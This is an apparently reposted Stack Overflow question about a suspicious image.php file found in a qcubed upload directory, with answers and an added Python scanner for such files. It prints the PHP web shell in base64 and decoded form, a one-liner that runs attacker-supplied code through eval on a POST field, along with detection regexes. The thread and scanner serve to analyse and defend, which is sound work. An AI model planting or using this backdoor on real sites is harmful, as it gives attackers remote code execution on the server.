What does eval on base64 encoded $_POST['e'] variable actually do?

Posted by 橙三吉。 on 2019-12-05 20:52:43

Question


Ok so here's what I've googled:

It seems there is an uploaded file named "image.php" that is uploaded in a qcubed directory.

That image.php file contains the following base64 code:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

Decoded, it adds up to this:

if(isset($_POST['e']))
    eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

Searching for the outputted string I found similar qcubed vulnerabilities on other sites.

Decoding the last echoed string I got:

196.231-172.28:ifacermpubmice:afac42eri02

Which I really don't understand what it does (using: http://ostermiller.org/calc/encode.html).

Can you please explain to me what in particular I'm facing here? What security vulnerability should I address in order to fix this?


Answer 1:


The script will execute any PHP code it gets from the e POST variable, which of course is a horrible, most dangerous vulnerability.

The echo statement might be a confirmation for the attacking script that the correct version is installed or something.

However, this is only dangerous if the image.php file can actually be executed in that directory. It's hard to give advice on what to do without knowing how the file got there in the first place.
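
A defensive check for the pattern described in the answer above, as an added example that is not part of the original thread: it peels base64 layers from a file's contents, flags eval() applied to request input, and decodes any quoted hex marker. The regexes, thresholds and function names are assumptions for illustration; the sample is rebuilt from the decoded lines shown in the question.

```python
import base64
import binascii
import re

# eval() whose argument reaches request input, possibly through decoders.
EVAL_ON_INPUT = re.compile(
    r"\beval\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")        # assumed threshold
HEX_LITERAL = re.compile(r"'((?:[0-9a-fA-F]{2}){8,})'")  # quoted hex string

# Constructed sample: the decoded code from the question, re-encoded the way
# the asker found it stored in image.php.
DECODED_PHP = ("if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo "
               "'3139362e3233312d3137322e32383a6966616365726d7075626d69"
               "63653a6166616334326572693032';")
SAMPLE = base64.b64encode(DECODED_PHP.encode()).decode()
BENIGN = "<?php echo htmlspecialchars($_POST['name']); ?>"  # constructed


def layers(text, depth=3):
    """Yield text, then each base64 run inside it decoded, `depth` levels deep."""
    yield text
    if depth == 0:
        return
    for run in B64_RUN.findall(text):
        try:
            decoded = base64.b64decode(run, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64 text, e.g. the hex marker itself
        yield from layers(decoded, depth - 1)


def scan(text):
    """Return (kind, detail) findings for one file's contents."""
    findings = []
    for layer in layers(text):
        match = EVAL_ON_INPUT.search(layer)
        if match:
            findings.append(("eval-on-request-input", match.group(0)))
        for literal in HEX_LITERAL.findall(layer):
            marker = bytes.fromhex(literal).decode("latin-1")
            findings.append(("hex-marker", marker))
    return findings


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE):
        print(kind, "->", detail)
```

Run over the files in upload directories, where no executable PHP should live at all; a hit means the file should be quarantined and the upload path investigated.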




Answer 2:


Most likely a script kiddie used an exploit to break into your site. Make sure your PHP application and libraries are up to date.



Source: https://stackoverflow.com/questions/4245594/what-does-eval-on-base64-encoded-poste-variable-actually-do
